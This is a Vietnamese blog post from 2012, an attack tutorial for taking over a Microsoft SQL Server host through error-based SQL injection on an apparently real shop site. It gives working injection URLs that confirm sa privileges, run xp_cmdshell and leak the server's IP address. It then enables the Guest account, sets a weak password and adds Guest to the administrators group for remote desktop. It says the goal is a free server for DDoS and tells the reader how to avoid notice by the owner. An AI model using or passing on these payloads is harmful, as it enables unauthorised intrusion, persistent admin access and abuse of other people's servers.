Chủ Nhật, 18 tháng 11, 2012

Cách tạo user để remote desktop khi có quyền Sa

Việc kiếm 1 con Server, VPS ngon ngon để nghịch ngợm, ddos hay làm gì đó. Nhưng buy thì hơi khó với thời buổi hiện nay.
Đầu tiên thì ta cần phải có đc victim
http://www.domain.com/product_category.asp?categoryL1=106'



Lỗi 

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '106'order by mscategory.L2order, mssubcategories.L3order'.
/side_nav_02.asp, line 27

Tiếp theo là ta phải kiểm tra xem nó có quyền sa ko? ta sử dụng cậu lệnh sau:

Code:
http://www.domain.com/product_category.asp?categoryL1=106%27and%201=convert%28int,system_user%29--sp_password

Và ta được kết quả như sau:

Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int.

Như này là dính Sa rồi đó
Công việc tiếp theo là ta
là đổ lệnh ip config vào table đẻ check ip server, cũng có thể bỏ qua bước này

Code:
http://www.Domain.com/product_category.asp?categoryL1=106';drop table abc create table abc (id int identity,nd varchar(1000)) insert into abc(nd) exec master..xp_cmdshell 'ipconfig'--sp_password

Như vậy là ta đã tạo đc 1 table mang tên A_ShiNiChi_VHC
Sau đó ta sẽ convert nó để xem ip là gì nhé

Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106%27and%201=convert%28int,%28select%20top%201%20nd%20from%20abc%20where%20nd%20like%20%28%27%25Ip%20address%25%27%29%29%29--sp_password

Ra Ip rồi nè

Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 67.43.167.119 ' to a column of data type int.

Tiếp theo thì mình sẽ tạo user và active nó, nâng quyền ngang với administrator để remote.
Thường thường thì Computer sẽ có thêm 1 user mặc định nữa đó là Guest.
Vì thế Shi sẽ chọn nó như vậy thì khi remote hoặc làm gì đỡ bị thằng chủ server phát hiện
Lưu ý: nếu remote xong rồi thì sau khi ko sử dụng nó nữa thì bạn nên Log off đi
1/ Tạo account Guest và active nó

Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106;exec master..xp_cmdshell 'net user guest /active:yes';--sp_password

2/ Tạo pass cho acc guest

Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106';exec master..xp_cmdshell 'net user guest 123456';--sp_password

Ở đây "123456" là pass
3/ Nâng quyền cho acc guest

Code:
http://www.heartsaverinc.com/product_category.asp?categoryL1=106';exec master..xp_cmdshell 'net localgroup administrators guest /add';--sp_password

Như vậy là đã xong rồi 

Không có nhận xét nào: